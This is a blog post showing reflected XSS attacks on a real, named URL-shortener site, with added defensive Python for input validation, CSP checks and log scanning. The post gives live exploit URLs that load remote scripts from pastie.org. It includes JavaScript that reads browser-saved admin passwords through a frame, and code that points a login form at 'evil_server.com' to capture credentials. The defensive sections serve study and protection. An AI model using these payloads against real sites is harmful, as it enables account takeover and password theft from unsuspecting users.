Some XSS Techniques and Real World Examples

Yesterday, Djerad Sofiane started a new url shortening website called Shr1nk.me (yeah you get it, shrink me) using the open source project yourls. So I tried to see how secure it was, and after a while I found a few vulnerabilities. I also promised Sofiane to show him live examples of how to exploit them (he is kinda newbie :D, nah seriously, he is a cool guy, check his blog out).

Ok, first I discovered that I can shrink links from the website itself, so an evil idea came to my mind: a DoS attack. I wanted to make the webserver loop infinitely trying to resolve the target. For example, I shortened the url http://shr1nk.me/1235 and pointed it to http://shr1nk.me/1234 and vice versa.
I thought this would make the server loop over and over to find the original link, but nah, it doesn't work like that: the server just sends the original url (the one that was shortened) back to the browser as a redirect, and it's the browser's job to fetch the new url. So this is useless, because even the browser detects redirect loops (5 redirects and it breaks the request): http://en.wikipedia.org/wiki/URL_redirection#Redirect_loops

Now to XSS. A simple check shows that the website is XSS'able; here's a simple alert() test: http://shr1nk.me/index.php?url="></a><script>alert(1)</script>. It doesn't work for me in Google Chrome, so Firefox it is.
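To see why the url parameter is exploitable and what the fix looks like, here is an added Python model (my code, not the post's and not yourls' own). It assumes a simplified anchor template that echoes the submitted URL raw, beside a hardened version that first checks the scheme and then HTML-attribute-encodes the value. The template, function names and sample payloads are assumptions; the payload shape is the one from the alert(1) test above.

```python
import html
from typing import Optional
from urllib.parse import urlsplit

# Constructed payload, same shape as the alert(1) test in the post (after URL-decoding).
PAYLOAD = '"></a><script>alert(1)</script>'

ALLOWED_SCHEMES = {"http", "https"}


def render_vulnerable(url: str) -> str:
    """Assumed simplified template: the submitted URL is dropped into an
    anchor as-is, so a quote closes the attribute and a tag follows."""
    return f'<p>Shortened: <a href="{url}">{url}</a></p>'


def validate_url(url: str) -> Optional[str]:
    """Accept only absolute http(s) URLs with a host; return None otherwise.
    This check matters because encoding alone does not make an href safe:
    'javascript:alert(1)' contains nothing html.escape would touch."""
    candidate = url.strip()
    parts = urlsplit(candidate)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return candidate


def render_hardened(url: str) -> str:
    """Validate first, then encode for the HTML attribute and text contexts.
    html.escape(quote=True) turns & < > " ' into entities, so the value can
    no longer terminate the attribute or open a tag."""
    safe = validate_url(url)
    if safe is None:
        return '<p class="error">Not a valid http(s) link.</p>'
    encoded = html.escape(safe, quote=True)
    return f'<p>Shortened: <a href="{encoded}">{encoded}</a></p>'


def opens_script_tag(markup: str) -> bool:
    """Crude check used by the demo: does the rendered HTML contain a real <script tag?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_hardened(PAYLOAD))
    print(render_hardened('http://example.com/"><script>alert(1)</script>'))
```

The two layers do different jobs: the scheme check stops `javascript:` links, which encoding would pass through untouched, and the encoding stops a syntactically valid http URL from breaking out of the attribute when its path carries a quote and a tag.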

Let’s explore 3 categories of attacks that might be exploited using XSS, of course combining these techniques will have bigger impact.

Reputation :

We can make a website's reputation as bad as we want by inserting inappropriate content, posting false news, etc. Remember! Users have to click your link to see this, because it is not a persistent XSS attack.
For example, if you click this link http://shr1nk.me/index.php?url=%22%3E%3C/a%3E%3Cscript%20src=http://pastie.org/868120.txt%3E%3C/script%3E, you should get something like this:

    // Write some annoying messages
    var b = document.getElementById('contenu');
    var s = "<h1>SOME STRANGE MESSAGE HERE!</h1>";
    b.innerHTML = s + "<img src='some evil pirate image here'/>";
You can see that, for an ordinary user, seeing this on his favorite website is a big deal (haven't you heard about Facebook's stupid users?? check it out).

Password Theft :

I have explained this in detail here http://www.martani.net/2009/08/xss-steal-passwords-using-javascript.html, and here is a simple customized version of how to steal the admin passwords if they are saved by the browser, transparently. The victim just has to click on the link and BOOM!!!!
http://shr1nk.me/index.php?url=%22%3E%3C/a%3E%3Cscript%20src=http://pastie.org/868131.txt%3E%3C/script%3E
    var frameset = document.createElement('frameset');
    var frame1 = document.createElement('frame');
    document.body.appendChild(frameset);
    frame1.setAttribute('src','admin/');   // same-origin login page, so its DOM is readable from here
    frameset.appendChild(frame1);

    function showLogin()
    {
        alert('login : ' + parent.frames[0].document.getElementById('username').value +
        '\npass : '+parent.frames[0].document.getElementById('password').value);
    }
    setTimeout(showLogin,1000);   // give the frame time to load and the browser time to fill the saved login

    // here, send the logins to the attacker's server using XHR


Trapping the victim into submitting his logins :

This uses the same technique as the password theft. When combined with the previous one it becomes really dangerous, unless the user is aware of how XSS works, has an XSS blocker like NoScript, or is using IE8.

The idea is to show the victim a login page and change the action of the form to point to the attacker's server rather than the real login page. A simple attack would be exploited like this:
    var frameset = document.createElement('frameset');
    var frame1 = document.createElement('frame');
    document.body.appendChild(frameset);
    frame1.setAttribute('src','admin/');
    frameset.appendChild(frame1);

    // HERE make the faked iFrame stretched to hide the real page
    // using the style attribute

    // Now change the action of the form to point to the attacker's server
    // or do it using XHR then submit the form to its real action

    parent.frames[0].document.forms[0].action = "http://evil_server.com/intercept_passwords.aspx";

    // here, send the logins to the attacker's server using XHR
Believe me, it works, and you can trap hundreds of users using this technique since it is completely transparent, and it leaves no trace because the user ends up signing in as he is supposed to.
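Both the password theft and the form hijack above need the same three things from the browser: load an external script (the pastie.org file), run inline script (the alert(1) test), and submit a form to a foreign host (evil_server.com). A Content Security Policy on the response, a browser mechanism that came later than this post, denies each of them separately. As an added example (my code, not the post's, not yourls', and not a browser's real CSP engine), here is a small Python evaluator of the script-src and form-action directives, run against those three needs. The page origin, function names and the simplified host matching (no paths, ports, nonces or hashes) are assumptions.

```python
from typing import Optional
from urllib.parse import urlsplit

# Constructed inputs: the page origin and the three things the post's payloads
# need (an external script, an inline script, a cross-site form action).
PAGE_ORIGIN = "http://shr1nk.me"
EXTERNAL_SCRIPT = "http://pastie.org/868131.txt"
HIJACKED_ACTION = "http://evil_server.com/intercept_passwords.aspx"


def parse_csp(policy: str) -> dict:
    """'dir a b; dir2 c' -> {'dir': ['a', 'b'], 'dir2': ['c']} (lower-cased)."""
    directives = {}
    for chunk in policy.split(";"):
        tokens = chunk.split()
        if tokens:
            directives[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    return directives


def source_matches(expr: str, url: str, page_origin: str) -> bool:
    """Simplified matching of one source expression against an absolute URL.
    Handles 'none', 'self', *, scheme://host, host and *.host; ignores path
    parts, ports, nonces and hashes (assumption: enough for this demo)."""
    u, p = urlsplit(url), urlsplit(page_origin)
    if expr == "'none'":
        return False
    if expr == "'self'":
        return (u.scheme, u.netloc) == (p.scheme, p.netloc)
    if expr.startswith("'"):          # other keywords never match a URL
        return False
    if expr == "*":
        return u.scheme in ("http", "https")
    if "://" in expr:
        scheme, host = expr.split("://", 1)
        if u.scheme != scheme:
            return False
    else:
        host = expr
    host = host.split("/")[0].split(":")[0]
    if host.startswith("*."):
        return bool(u.hostname) and u.hostname.endswith(host[1:])
    return u.hostname == host


def script_allowed(policy: str, page_origin: str, src: Optional[str] = None) -> bool:
    """src=None means an inline <script> block (the alert(1) test).
    script-src falls back to default-src; with neither present, scripts run."""
    directives = parse_csp(policy)
    governing = directives.get("script-src", directives.get("default-src"))
    if governing is None:
        return True
    if src is None:
        return "'unsafe-inline'" in governing
    return any(source_matches(s, src, page_origin) for s in governing)


def form_action_allowed(policy: str, page_origin: str, action: str) -> bool:
    """form-action does NOT fall back to default-src: absent means allowed."""
    governing = parse_csp(policy).get("form-action")
    if governing is None:
        return True
    return any(source_matches(s, action, page_origin) for s in governing)


def evaluate(policy: str, page_origin: str = PAGE_ORIGIN) -> dict:
    """Which of the post's three needs does this policy still permit?"""
    return {
        "external_script": script_allowed(policy, page_origin, EXTERNAL_SCRIPT),
        "inline_script": script_allowed(policy, page_origin),
        "form_hijack": form_action_allowed(policy, page_origin, HIJACKED_ACTION),
    }


if __name__ == "__main__":
    for name, policy in [("no policy", ""),
                         ("strict", "default-src 'self'; script-src 'self'; form-action 'self'")]:
        print(name, evaluate(policy))
```

The point worth remembering from the form-action branch: a policy of just `default-src 'self'` blocks the injected scripts but says nothing about where a form may post, so the action rewrite in the last attack needs its own `form-action 'self'`.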

I'm aware this was not detailed enough, but the subject is really vast, so if you plan to learn XSS, start by applying simple attacks like the first and second listed here (you have working source code). Then you will start to see clearly how some advanced attacks (like the last one) are exploited. I also recommend this book: http://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/1597491543.
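From the site owner's side, every one of the links in this post lands in the web server's access log with the payload percent-encoded in the url parameter, which makes attempts easy to spot after the fact. As an added example (my code, not the post's), here is a Python scanner that parses Apache combined-format lines, URL-decodes each query parameter (repeatedly, since double-encoding is a common evasion), flags values that contain markup, and pulls out any external script URL as an indicator. The log lines are constructed: the request URIs are the ones quoted in the post, while the addresses, timestamps and user agents are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-format lines. The request URIs are the ones
# quoted in the post; addresses, timestamps and user agents are made up.
SAMPLE_LOG = """\
10.0.0.7 - - [12/Mar/2010:10:01:02 +0100] "GET /index.php?url=http://example.com/page HTTP/1.1" 200 1873 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2010:10:02:11 +0100] "GET /index.php?url=%22%3E%3C/a%3E%3Cscript%20src=http://pastie.org/868131.txt%3E%3C/script%3E HTTP/1.1" 200 2044 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2010:10:02:40 +0100] "GET /index.php?url=%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2001 "-" "Mozilla/5.0"
10.0.0.3 - - [12/Mar/2010:10:03:05 +0100] "GET /1234 HTTP/1.1" 301 0 "-" "curl/7.19"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')
TAG_RE = re.compile(r'<\s*/?\s*[a-z][\w-]*', re.I)                  # any opening or closing tag
SRC_RE = re.compile(r'src\s*=\s*["\']?\s*(https?://[^\s"\'>]+)', re.I)  # external script/image source


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding; stops as soon as a round changes nothing."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(uri: str) -> list:
    """Return one finding per query parameter whose decoded value contains markup."""
    findings = []
    query = urlsplit(uri).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            value = fully_decode(raw)
            tags = [t.lower() for t in TAG_RE.findall(value)]
            if tags:
                findings.append({
                    "param": name,
                    "tags": tags,
                    "script_src": SRC_RE.findall(value),   # hosts worth blocking and hunting for
                })
    return findings


def scan(log_text: str) -> list:
    """Parse each line and attach any markup findings to its client IP and time."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for finding in inspect_request(m.group("uri")):
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "status": m.group("status"), **finding})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 status on a hit means the server reflected the payload rather than rejecting it, so the status column is the quickest way to separate probes against a fixed site from successful exploitation of a vulnerable one.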
